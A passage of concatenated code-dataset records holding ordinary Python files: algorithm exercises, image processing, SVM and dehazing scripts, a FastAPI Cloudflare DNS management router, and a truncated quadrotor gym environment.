chrome_style=styles['comment'],\n                tick_label_style=styles['metavar'],\n                yaxis_kwargs={'tick_label_format': {'prefix': '$'}},\n                char_dict=ctc.config.get_cli_chart_charset(),\n            )\n            print()\n            toolstr.print(\n                toolstr.hjustify(chain, 'center', 70),\n                indent=4,\n                style=styles['title'],\n            )\n            print()\n            toolstr.print(\n                plot,\n                indent=4,\n            )\n            print()\n","repo_name":"checkthechain/checkthechain","sub_path":"src/ctc/protocols/llama_utils/llama_tvls.py","file_name":"llama_tvls.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","stars":799,"dataset":"github-code","pt":"27"}
+{"seq_id":"26713239217","text":"from heapq import heappop, heappush\nimport sys\ninput = sys.stdin.readline\nINF = sys.maxsize\nN, M, K = map(int, input().split())\nmatrix = [[] for _ in range(N)]\nfor _ in range(M):\n    a, b, t = map(int, input().split())\n    a -= 1; b -= 1\n    matrix[b].append((t, a)) # Instead of computing the distance from every house to the interview sites, reverse the edges and search outward from the interview sites toward the houses -- faster because of the constraint K <= N,\n    # and with the interview sites as the sources, starting from all of them at once causes no problem. If you instead zeroed out every house and ran Dijkstra from the houses, some destinations could end up unreachable.\n    # Every applicant must travel to the nearest interview site, which may mean passing through other houses on the way; resetting the houses' visit values to 0 would break that movement.\n    # Moving between interview sites, however, never happens: once the shortest path from a house reaches a site there is nothing left to do, since everyone goes to the site nearest their house.\nk_list = list(map(int, input().rstrip().split())) # positions of the interview sites\nstart = []\nvisited = [INF] * N\nfor i in k_list:\n    i -= 1 # -1 because the input is 1 ~ N rather than 0 ~ N-1\n    visited[i] = 0\n    heappush(start, (0, i)) # Everyone heads to their nearest site, and pushing all the sources at once is fine: Dijkstra then finds, for each house, its nearest site automatically.\nwhile start:\n    x, node = heappop(start)\n    if x > visited[node]:\n        continue\n    for k, v in matrix[node]:\n        nx = x + k\n        if visited[v] > nx:\n            visited[v] = nx\n            heappush(start, (nx, v))\nnum = 0 # number of the farthest house\nresult = 0 # distance to the farthest house\nfor i in range(N):\n    if visited[i] > result:\n        result = visited[i]\n        num = i+1 # +1 to undo the earlier -1 applied to the input value\nprint(num)\nprint(result)","repo_name":"tnpfldyd/TIL","sub_path":"baekjoon/17835.py","file_name":"17835.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"33241379637","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import trange\n\ndirections = [\n    [1, 0],\n    [1, -1],\n    [0, -1],\n    [-1, -1],\n    [-1, 0],\n    [-1, 1],\n    [0, 1],\n    [1, 1],\n]\n\n\ndef calc_occupied(a, i, j):\n    occ = 0\n    ymax, xmax = a.shape\n    for dy, dx in directions:\n        amp = 1\n        while 0 < i + dy * amp < ymax and 0 < j + dx * amp < xmax:\n            if a[i + dy * amp, j + dx * amp] == 1:\n                occ += 1\n                break\n            elif a[i + dy * amp, j + dx * amp] == 0:\n                break\n            amp += 1\n\n    return occ\n\n\ndef iterate(a):\n    N = a.shape[0] - 2\n    M = a.shape[1] - 2\n    a_new = np.zeros_like(a)\n    a_new[:, :] = np.nan\n    for i in range(1, N + 1):\n        for j in range(1, M + 1):\n\n            if np.isnan(a[i, j]):\n                a_new[i, j] = np.nan\n\n            elif a[i, j] == 0:\n                occupied = calc_occupied(a, i, j)\n                if occupied == 0:\n                    a_new[i, j] = 1\n                else:\n                    a_new[i, j] = a[i, j]\n\n            elif a[i, j] == 1:\n                occupied = calc_occupied(a, i, j)\n                if occupied >= 5:\n                    a_new[i, j] = 0\n                else:\n                    a_new[i, j] = a[i, j]\n\n    return a_new\n\n\ndef main():\n    with open(\"data/data_11.txt\", \"r\") as f:\n        raw = f.read()\n\n    raw = raw.split(\"\\n\")[:-1]\n    N = len(raw)\n    M = len(raw[0])\n    in_array = np.array([list(x) for x in raw])\n\n    a = np.zeros([N + 2, M + 2])\n    a[:, :] = np.nan\n    a[1:-1, 1:-1][in_array == \"L\"] = 0\n    a[1:-1, 1:-1][in_array == \".\"] = np.nan\n\n    prev_sum = -1\n    for i in trange(1000):\n        a = iterate(a)\n        if prev_sum == np.nansum(a):\n            plt.figure()\n            plt.imshow(a, vmin=0, vmax=1)\n            plt.show()\n            return int(prev_sum)\n        prev_sum = np.nansum(a)\n        print(prev_sum)\n\n\nif __name__ == \"__main__\":\n    print(main())\n","repo_name":"jaimeliew1/AdventOCode_2020","sub_path":"day11b.py","file_name":"day11b.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30347122639","text":"'''\nWrite a script that reads in the words from the words.txt file and finds and prints:\n\n1. The shortest word (if there is a tie, print all)\n2. The longest word (if there is a tie, print all)\n3. 
The total number of words in the file.\n\n'''\nshortest = []\nlongest = []\nn = 0\nwith open(\"words.txt\") as f:\n    for line in f.readlines():\n        n += 1\n        if n == 1:\n            shortest.append(line.strip())\n            longest.append(line.strip())\n        if len(line.strip()) < len(shortest[0]):\n            shortest = []\n            shortest.append(line.strip())\n        elif len(line.strip()) == len(shortest[0]) and line.strip() != shortest[0]:\n            shortest.append(line.strip())\n        if len(line.strip()) > len(longest[0]):\n            longest = []\n            longest.append(line.strip())\n        elif len(line.strip()) == len(longest[0]) and line.strip() != longest[0]:\n            longest.append(line.strip())\nprint(shortest)\nprint(longest)\nprint(f\"In total {n} words.\")\n","repo_name":"mingyyy/onsite","sub_path":"week_03/01_files/01_words_analysis.py","file_name":"01_words_analysis.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38414058726","text":"\"\"\"\nGiven an integer n, return any array containing \nn unique integers such that they add up to 0.\n\nExample 1:\nInput: n = 5\nOutput: [-7,-1,1,3,4]\nExplanation: These arrays also are accepted [-5,-1,1,2,3] , [-3,-1,2,-2,4].\n\nExample 2:\nInput: n = 3\nOutput: [-1,0,1]\n\nExample 3:\nInput: n = 1\nOutput: [0]\n\nConstraints:\n\n1 <= n <= 1000\n\"\"\"\n\nfrom typing import List\n\nclass Solution:\n    def sumZero(self, n: int) -> List[int]:\n        ret = list()\n        if n % 2 == 1:\n            ret.append(0)\n        for i in range(1, n // 2 + 1):\n            ret.extend([i, -i])\n        return ret\n    ","repo_name":"YskSt030/LeetCode_Problems","sub_path":"1304.FindNUniqueIntegersSumuptoZero.py","file_name":"1304.FindNUniqueIntegersSumuptoZero.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71503148552","text":"import cv2\nimport os\nimport argparse\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-d', '--dir', type=str, default='./real_images/no_mask/two_hairties_resized')\n    args = parser.parse_args()\n    output_dir = args.dir + '_editted'\n    if not os.path.exists(output_dir):\n    \tos.mkdir(output_dir)\n\n    alpha = 1.65 # Contrast control (1.0-3.0)\n    beta = 0 # Brightness control (0-100)\n    for f in os.listdir(args.dir):\n        img = cv2.imread('%s/%s'%(args.dir, f)).copy()\n        print(f)\n        adjusted = cv2.convertScaleAbs(img, alpha=alpha, beta=beta)\n        filename = output_dir + '/' + f\n        cv2.imwrite('{}'.format(filename), adjusted)\n","repo_name":"BerkeleyAutomation/multiple-rope-detangling","sub_path":"blender-rope-sim/brighten_contrast.py","file_name":"brighten_contrast.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42859022894","text":"\"\"\"\nExample: export markers to trc\n\"\"\"\n\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom pyosim import Conf\nfrom pyosim import Markers3dOsim\nfrom project_conf import PROJECT_PATH\n\nconf = Conf(project_path=PROJECT_PATH)\nparticipants = conf.get_participants_to_process()\n\nmarkers_labels = conf.get_conf_field(participant=participants[0], field=['markers', 'targets'])\n\n\nfor iparticipant in participants:\n    print(f'\\nparticipant: {iparticipant}')\n    directories = conf.get_conf_field(participant=iparticipant, field=['markers', 'data'])\n    assigned = conf.get_conf_field(participant=iparticipant, field=['markers', 'assigned'])\n\n    for idir in directories:\n        print(f'\\n\\tdirectory: 
{idir}')\n\n for itrial in Path(idir).glob('*.c3d'):\n blacklist = False\n # try participant's channel assignment\n for iassign in assigned:\n\n # delete some markers if particular trials (box markers during score)\n if Path(idir).stem == 'MODEL2':\n iassign = [i if n < 43 else '' for n, i in enumerate(iassign)]\n # skip some trials\n if itrial.stem[-1] == '0':\n pass\n else:\n blacklist = True\n break\n\n nan_idx = [i for i, v in enumerate(iassign) if not v]\n if nan_idx:\n iassign_without_nans = [i for i in iassign if i]\n else:\n iassign_without_nans = iassign\n\n try:\n markers = Markers3dOsim.from_c3d(itrial, names=iassign_without_nans, prefix=':')\n if nan_idx:\n # if there is any empty assignment, fill the dimension with nan\n for i in nan_idx:\n markers = np.insert(markers, i, np.nan, axis=1)\n print(f'\\t{itrial.stem} (NaNs: {nan_idx})')\n else:\n print(f'\\t{itrial.stem}')\n\n # check if dimensions are ok\n if not markers.shape[1] == len(iassign):\n raise ValueError('Wrong dimensions')\n break\n except IndexError:\n markers = []\n\n if not blacklist:\n markers.get_labels = markers_labels\n trc_filename = f\"{PROJECT_PATH / iparticipant / '0_markers' / itrial.stem}.trc\"\n markers.to_trc(filename=trc_filename)\n","repo_name":"pariterre/pyosim","sub_path":"examples/_1_markers.py","file_name":"_1_markers.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"16591530569","text":"# -*- coding: utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef dark_channel(img, size=30):\r\n r, g, b = cv2.split(img)\r\n min_img = cv2.min(r, cv2.min(g, b))\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (size, size))\r\n dc_img = cv2.erode(min_img, kernel)\r\n return dc_img\r\n\r\n\r\ndef get_atmo(img, percent=0.005):\r\n mean_perpix = np.mean(img, axis=2).reshape(-1)\r\n mean_topper = mean_perpix[:int(img.shape[0] * img.shape[1] * percent)]\r\n return np.mean(mean_topper)\r\n\r\n\r\ndef get_trans(img, atom, w=0.95):\r\n x = img / atom\r\n t = 1 - w * dark_channel(x, 15)\r\n return t\r\n\r\n\r\ndef guided_filter(p, i, r, e):\r\n # 1\r\n mean_I = cv2.boxFilter(i, cv2.CV_64F, (r, r))\r\n mean_p = cv2.boxFilter(p, cv2.CV_64F, (r, r))\r\n corr_I = cv2.boxFilter(i * i, cv2.CV_64F, (r, r))\r\n corr_Ip = cv2.boxFilter(i * p, cv2.CV_64F, (r, r))\r\n # 2\r\n var_I = corr_I - mean_I * mean_I\r\n cov_Ip = corr_Ip - mean_I * mean_p\r\n # 3\r\n a = cov_Ip / (var_I + e)\r\n b = mean_p - a * mean_I\r\n # 4\r\n mean_a = cv2.boxFilter(a, cv2.CV_64F, (r, r))\r\n mean_b = cv2.boxFilter(b, cv2.CV_64F, (r, r))\r\n # 5\r\n q = mean_a * i + mean_b\r\n return q\r\n\r\n\r\ndef recover(img, t, a):\r\n r = np.empty_like(img)\r\n for i in range(3):\r\n r[:, :, i] = (img[:, :, i] - a) / t + a\r\n return r\r\n\r\n\r\ndef DCP_dehaze(im):\r\n img = im.astype('float64') / 255\r\n img_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY).astype('float64') / 255\r\n\r\n atmo = get_atmo(img)\r\n trans = get_trans(img, atmo)\r\n trans_guided = guided_filter(trans, img_gray, 20, 0.0001)\r\n trans_guided = cv2.max(trans_guided, 0.25)\r\n result = recover(img, trans_guided, atmo)\r\n\r\n return result.astype(np.float32)\r\n\r\n\r\nif __name__ == '__main__':\r\n path = r\"G:\\Digital Image Processing\\Test_img\\0010_0.95_0.16.jpg\"\r\n im = cv2.imread(path)\r\n res = DCP_dehaze(im)\r\n plt.title('DCP')\r\n plt.imshow(cv2.cvtColor(res.astype(np.float32), cv2.COLOR_BGR2RGB))\r\n 
plt.show()\r\n","repo_name":"xue362/Image-Dehaze-DCP-and-Encoder-Decoder-Net","sub_path":"DCP.py","file_name":"DCP.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"16777877544","text":"import click\nfrom ..cli.util import with_app\n\n\n@click.command(name=\"show-interface\")\n@click.argument(\"model\", type=click.STRING)\n@click.option(\"--depth\", \"-d\", type=int, default=0)\n@with_app\ndef show_interface(app, model, depth=0):\n \"\"\"\n Show the import interface for a database model.\n \"\"\"\n # `using` is related to this issue:\n # https://github.com/ipython/ipython/issues/11523\n m = getattr(app.database.interface, model)\n m().pretty_print(nested=depth)\n","repo_name":"EarthCubeGeochron/Sparrow","sub_path":"backend/sparrow/core/import_helpers/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"27"} +{"seq_id":"34527326146","text":"import sqlite3\nimport pickle\nfrom sklearn.externals import joblib \nfrom dijktras_algorithm import *\nfrom sklearn.externals import joblib\nimport numpy as np\n\ndef push_file(value, column_name, table_name):\n\t\"\"\"\n\tTries to insert an ID (if it does not exist yet)\n\twith a specific value in a second column\n\t\"\"\"\n\tc.execute(\"INSERT OR IGNORE INTO {tn} ({cn}) VALUES ({v})\".format(tn=table_name, cn=column_name, v=value))\n\n\ndef push_2_values(value1, value2, column_name, table_name):\n\t\"\"\"\n\tInserts 2 values into 1 slot in the db.\n\t\"\"\"\n\tc.execute(\"INSERT INTO {tn} ({cn}) VALUES ({v1}, {v2})\".format(tn=table_name, cn=column_name, v1=value1, v2 = value2))\n\t\n\nif __name__ == \"__main__\":\n\n\tall_formality_scores = joblib.load(\"normalized_formality_scores.pkl\")\n\tall_sentiment_scores = joblib.load(\"normalized_sentiment_scores.pkl\")\n\texchanges_CC = joblib.load(\"exchange_number_map_cc.p\")\n\n\tsqlite_file = 'Enron_Entity.db'\n\ttable_name = 'Nodegraph'\n\tPERSON1 = 'PERSON1'\n\tPERSON2 = 'PERSON2'\n\tTIME_KNOWN = 'TIMEKNOWN'\n\tFORMALITY_SCORE = 'FORMALITY'\n\tSENTIMENT_SCORE = 'SENTIMENT'\n\tNUM_EXCHANGES = 'EXCHANGECOUNT'\n\tHEURISTIC_SCORE = 'SCORE'\n\n\t# Connecting to the database file\n\tconn = sqlite3.connect(sqlite_file)\n\tc = conn.cursor()\n\n\t# Add overall formality score\n\tcc = 1\n\tfor i in range(len(all_formality_scores)):\n\t\tvalue = all_formality_scores[i][1][0]\n\t\tpush_file(value, FORMALITY_SCORE, table_name)\n\t\tprint (\"FORMALITY_SCORE ... inserting row #: \", cc) \n\t\tcc += 1\n\n\t# Add overall sentiment score\n\tcc = 1\n\tfor i in range(len(all_sentiment_scores)):\n\t\tvalue = all_sentiment_scores[i][0]\n\t\tpush_file(value, SENTIMENT_SCORE, table_name)\n\t\tprint (\"SENTIMENT_SCORE ... inserting row #: \", cc) \n\t\tcc += 1\n\n\n\texchanges_CC = joblib.load(\"exchange_number_map_cc.p\")\n\tp1 = []\n\tp2 = []\n\tnum_exchanges = []\n\tfor key, value in exchanges_CC.items():\n\t\tp1.append(key[0])\n\t\tp2.append(key[1])\n\t\tnum_exchanges.append(value)\n\n\t# Add person 1\n\tcc = 1\n\tfor thing in p1:\n\t\tt = thing.split()\n\t\tvalue = thing\n\t\tpush_file(thing, PERSON1, table_name)\n\t\tprint (\"PERSON1 ... inserting row #: \", cc) \n\t\tcc += 1\n\n\t# Add person 2\n\tcc = 1\n\tfor thing in p2:\n\t\tvalue = thing\n\t\tpush_file(value, PERSON2, table_name)\n\t\tprint (\"PERSON2 ... 
inserting row #: \", cc) \n\t\tcc += 1\n\n\tconn.commit()\n\tconn.close()\n\n\n","repo_name":"dhanush-ai1990/CapitalMarketsAmplify","sub_path":"Code/Relationship_Understanding/push_data.py","file_name":"push_data.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22723563205","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm\n\n\n\ndef main():\n    # X = np.array([[1, 1], [2, 2], [2, 0], [0, 0], [1, 0], [0, 1]])\n    # y = np.array([1, 1, 1, -1, -1, -1])\n    X = np.array([[1, 1], [2, 2], [2, 0], [0, 0], [1, 0], [0, 1]])\n    y = np.array([1, 1, 1, -1, -1, -1])\n    C = 100  # SVM regularization parameter\n    clf = svm.SVC(C=C, kernel='linear')\n    clf = clf.fit(X, y)\n    print('Support Vectors: ', clf.support_vectors_)\n    print('Weights: %s intercept: %s' % (clf.coef_, clf.intercept_))\n    print('Dual Weights: %s' % clf.dual_coef_)\n
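\n    # Illustrative extra line (an addition, not in the original script): for a\n    # (near-)hard-margin linear fit like this separable toy problem, the distance\n    # between the two margin hyperplanes is 2/||w||.\n    print('Margin width: %s' % (2 / np.linalg.norm(clf.coef_)))\n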
    # title for the plots\n    visualize_svm(X, y, clf)\n\n\ndef visualize_svm(X, y, clf):\n    X0, X1 = X[:, 0], X[:, 1]\n    plt.scatter(X0, X1, c=y, cmap=plt.cm.Paired, s=30)\n    ax = plt.gca()\n    xlim = ax.get_xlim()\n    ylim = ax.get_ylim()\n\n    # create grid to evaluate model\n    xx = np.linspace(xlim[0], xlim[1], 30)\n    yy = np.linspace(ylim[0], ylim[1], 30)\n    YY, XX = np.meshgrid(yy, xx)\n    xy = np.vstack([XX.ravel(), YY.ravel()]).T\n    Z = clf.decision_function(xy).reshape(XX.shape)\n\n    # plot decision boundary and margins\n    ax.contour(XX, YY, Z, colors='k', levels=[-1, 0, 1], alpha=0.5,\n               linestyles=['--', '-', '--'])\n    # plot support vectors\n    ax.scatter(clf.support_vectors_[:, 0], clf.support_vectors_[:, 1], s=100,\n               linewidth=1, facecolors='none')\n    plt.show()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"YingLaiLin/homework_machine_learning","sub_path":"homework_3/test_svm.py","file_name":"test_svm.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"74598064712","text":"import inspect\nfrom typing import List\n\nimport CloudFlare\n\nfrom fastapi import APIRouter, Depends, Body\nfrom fastapi.security import OAuth2PasswordBearer\nfrom pydantic import BaseModel\n\nfrom App import ext\nfrom App.response import list_response, dict_response\nfrom App.utils import dns, zone_setting\nfrom App.utils.common import get_setting\n\nrouter = APIRouter()\n\nsetting = get_setting()\n\n\nclass zone(BaseModel):\n    zone_name: str\n\n\nclass purge(BaseModel):\n    purge_everything: bool = False\n    files: list = []\n\n\nclass zone_setting_model(BaseModel):\n    id: str\n    value: str\n\n\nclass zone_settings(BaseModel):\n    data: List[zone_setting_model]\n\n\nclass pagerule_model(BaseModel):\n    targets: list\n    actions: list\n    priority: int\n    status: str\n\n\nclass Token(BaseModel):\n    access_token: str\n    token_type: str\n\n\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"/login\")\n\n\ndef get_current_user_cf(token: str = Depends(oauth2_scheme)):\n    user = ext.get_current_user(token)\n    return CloudFlare.CloudFlare(\n        email=user.get('cloudflare_email'),\n        token=user.get('user_api_key'),\n        debug=setting.DEBUG\n    )\n\n\ndef get_current_user(token: str = Depends(oauth2_scheme)):\n    return ext.get_current_user(token)\n\n\ndef get_current_key(cf):\n    return inspect.stack()[1][3] + cf._base.email\n\n\n# Get the zone (domain) list\n\n@router.get('/zone_list', response_model=list_response)\nasync def get_zones(cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.get_zones(cf)\n\n\n# Get a zone's DNS records\n@router.get('/get_dns_records', response_model=list_response)\nasync def get_dns_records(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.get_dns_records(cf, zone_id)\n\n\n# Get record info\n@router.get('/get_dns_record_info', response_model=dict_response)\nasync def get_dns_record_info(zone_id: str, dns_record_id: str,\n                              cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.get_dns_record_info(cf, zone_id, dns_record_id)\n\n\n# Get zone info\n@router.get('/get_zone_info', response_model=dict_response)\nasync def get_zone_info(zone_name: str = None, zone_id: str = None,\n                        cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.get_zone_info(cf, zone_name, zone_id)\n\n\n# Create a record\n@router.post('/do_dns_record_create', response_model=dict_response)\nasync def do_dns_record_create(zone_id: str, dns_record: dns.Dns_record,\n                               cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.do_dns_record_create(\n        cf, zone_id, dns_record)\n\n\n# Update a record\n@router.put('/do_dns_record_update', response_model=dict_response)\nasync def do_dns_record_update(zone_id: str, dns_record_id: str, dns_record: dns.Dns_record,\n                               cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.do_dns_record_update(\n        cf, zone_id, dns_record_id, dns_record)\n\n\n# Delete a record\n@router.delete('/do_dns_record_delete', response_model=dict_response)\nasync def do_dns_record_delete(zone_id: str, dns_record_id: str,\n                               cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.do_dns_record_delete(\n        cf, zone_id, dns_record_id)\n\n\n# Delete a zone\n@router.delete('/do_zone_delete', response_model=dict_response)\nasync def do_zone_delete(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.do_zone_delete(cf, zone_id)\n\n\n# Create a zone\n@router.post('/do_zone_create', response_model=dict_response)\nasync def do_zone_create(zone: zone, user=Depends(get_current_user),\n                         cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.do_zone_create(cf, setting.HOST_KEY, user.get('user_key'), zone.zone_name)\n\n\n# Purge the cache\n@router.post('/do_cache_purge', response_model=dict_response)\nasync def do_cache_purge(zone_id: str, params: purge, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return dns.do_cache_purge(cf, zone_id, params)\n\n\n# Get all zone settings\n@router.get('/get_all_zone_settings', response_model=list_response)\nasync def get_all_zone_settings(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.get_all_zone_settings(cf, zone_id)\n\n\n# Get a specific zone setting (renamed from a duplicate get_all_zone_settings definition)\n@router.get('/get_zone_setting', response_model=list_response)\nasync def get_zone_setting(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.get_all_zone_settings(cf, zone_id)\n\n\n# Batch-update zone settings\n@router.patch('/do_zone_settings_update', response_model=list_response)\nasync def do_zone_settings_update(zone_id: str, data: zone_settings,\n                                  cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.do_zone_settings_update(cf, zone_id, data)\n\n\n# Update a specific zone setting\n@router.patch('/do_zone_setting_update', response_model=dict_response)\nasync def do_zone_setting_update(zone_id: str, type: str, value=Body(..., embed=True),\n                                 cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.do_zone_setting_update(cf, zone_id, type, value)\n\n\n# Get page rules\n@router.get('/get_zone_pagerules', response_model=list_response)\nasync 
def get_zone_pagerules(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.get_zone_pagerules(cf, zone_id)\n\n\n# Get the list of page-rule settings\n@router.get('/get_zone_pagerule_setting', response_model=list_response)\nasync def get_zone_pagerule_setting(zone_id: str, cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.get_zone_pagerule_setting(cf, zone_id)\n\n\n# Create a page rule\n@router.post('/do_zone_pagerule_create', response_model=list_response)\nasync def do_zone_pagerule_create(zone_id: str, data: pagerule_model,\n                                  cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.do_zone_pagerule_create(cf, zone_id, data)\n\n\n# Delete a page rule\n@router.delete('/do_zone_pagerule_delete', response_model=list_response)\nasync def do_zone_pagerule_delete(zone_id: str, pagerule_id: str,\n                                  cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.do_zone_pagerule_delete(cf, zone_id, pagerule_id)\n\n\n# Get page-rule details\n@router.get('/get_zone_pagerule_details', response_model=list_response)\nasync def get_zone_pagerule_details(zone_id: str, pagerule_id: str,\n                                    cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.get_zone_pagerule_details(cf, zone_id, pagerule_id)\n\n\n# Update a page rule\n@router.put('/do_zone_pagerule_update', response_model=dict_response)\nasync def do_zone_pagerule_update(\n    zone_id: str, pagerule_id: str, data: pagerule_model,\n    cf: CloudFlare.CloudFlare = Depends(get_current_user_cf)):\n    return zone_setting.do_zone_pagerule_update(cf, zone_id, pagerule_id, data)\n","repo_name":"Hidove/CloudflarePanelPython","sub_path":"App/views/domain_manage.py","file_name":"domain_manage.py","file_ext":"py","file_size_in_byte":7161,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"27"} +{"seq_id":"6028917391","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport math\nimport numpy as np\nfrom timeit import default_timer as timer\n#from scipy.integrate import odeint\n#from scikits.odes.odeint import odeint\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('TkAgg')\n\n# For testing whether a number is close to zero\n_FLOAT_EPS = np.finfo(np.float64).eps\n_EPS4 = _FLOAT_EPS * 4.0\n\nclass ReinmavEnv(gym.Env):\n\tmetadata = {'render.modes': ['human']}\n\tdef __init__(self):\n\t\tprint(\"__init__ called\")\n\t\tself.arm_length = 0.0860 #in meter \n\t\tself.mass = 0.1800 # in kg\n\t\tself.gravity=9.8100 # in m/s^2=N/kg\n\t\tself.min_force=0.0\n\t\tself.max_force=3.5316 # in N\n\t\tself.Inertia= np.matrix([[0.00025, 0 , 2.55e-06],\n\t\t\t\t\t\t\t [0,0.000232,0],\n\t\t\t\t\t\t\t [2.55e-06,0,0.0003738]]) #moment of inertia, kg m^2\n\t\tself.invInertia=self.Inertia.getI()\n\n\t\t# This will be used when implementing reinforcement controllers.\n\t\t# self.low_state = np.array([self.min_position, -self.max_speed])\n\t\t# self.high_state = np.array([self.max_position, self.max_speed])\n\t\t# self.viewer = None\n\t\t# self.action_space = spaces.Box(low=self.min_action, high=self.max_action, shape=(1,),dtype=np.float32)\n\t\t# self.observation_space = spaces.Box(low=self.low_state, high=self.high_state, dtype=np.float32)\n\n\t\tself.t=0.0\n\t\tself.dt=1/100 #1.0/5000 #10ms\n\t\t#self.dt=1.0/5000 #10ms\n\t\t\n\t\t# self.action=0\n\t\t#self.init_state=[0.01, 0.01, 0.01, 0.05, 0.05, 0.05, 0.8, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] #init value for [x, y, z, dx, dy, dz, qw, qx, qy, qz, p, q, r]\n\t\tself.init_state=[0.00, 
0.00, 0.00, 0.00, 0.00, 0.00, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] #init value for [x, y, z, dx, dy, dz, qw, qx, qy, qz, p, q, r]\n\t\t\n\t\tself.state=self.init_state\n\t\tself.cum_state=self.stateToQd(self.state)\n\t\t#self.seed()\n\t\tself.cum_desired_state=[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] #[x,y,z,dx,dy,dz,ddx,ddy,ddz,yaw,dyaw]\n\t\tself.cum_t=[0.0]\n\n\tdef seed(self, seed=None):\n\t\tprint(\"seed\")\n\t\tself.np_random, seed = seeding.np_random(seed)\n\t\treturn [seed]\n\tdef myODE(self):\n\t\tds=1/5000\n\t\ttimeint = np.arange(self.t, self.t+self.dt,ds)\n\t\tfor t in timeint:\n\t\t\ts_t=timer()\n\t\t\txdot = self.quad_eq_of_motion1(self.state,t)\n\t\t\te_t=timer()\n\t\t\t#print(\"dura={}ms\".format((e_t-s_t)*1e3))\n\t\t\tself.state = self.state+ds*xdot\n\tdef step(self):\n\t\tstart_t=timer()\n\t\t#Simple Euler integration, note that chooseing dt is important due to linearizing the nonlinearity of EOM. 1/1000 and 1/100 didn't work (i.e., numerical unstable by generating NaNs) but 1/10000 looks good.\n\t\t#xdot = self.quad_eq_of_motion1(self.state,self.t)\n\t\t#self.state = self.state+self.dt*xdot\n\t\tself.myODE()\n\t\tend_t = timer()\n\t\t#I can't control the behaviors of odeint (e.g., step-size) and it seems I didn't fully understand how this work under the hood.. so change odeint to a simple Euler integration by sacrificing accuracy...\n\n\t\t#state = odeint(self.quad_eq_of_motion1, self.state, [self.t,self.t+self.dt])#,atol=1.0e-5, rtol=1.0e-5) #takes about 1.6097ms\n\n\t\tdesired_state=self.trj_gen(self.t+self.dt)\n\t\tdone = True #bool(self.state[0] >= self.goal_position)\n\t\treward = 0\n\t\tif done:\n\t\t\treward = 100.0\n\t\t#reward-= math.pow(action,2)*0.1\n\t\treward-= 10.0\n\n\t\t#Update time\n\t\tself.t = self.t+self.dt\n\t\t\n\t\t#Store time, state, and desired for plot\n\t\tself.cum_desired_state = np.vstack([self.cum_desired_state,desired_state])\n\t\tself.cum_state = np.vstack([self.cum_state,self.stateToQd(self.state)])\n\t\tself.cum_t.append(self.t)\n\t\t#print(\"step duration= {}ms\".format((end_t-start_t)*1e3)) #average 1.2ms\n\t\treturn self.state, reward, done, {}\n\n\tdef 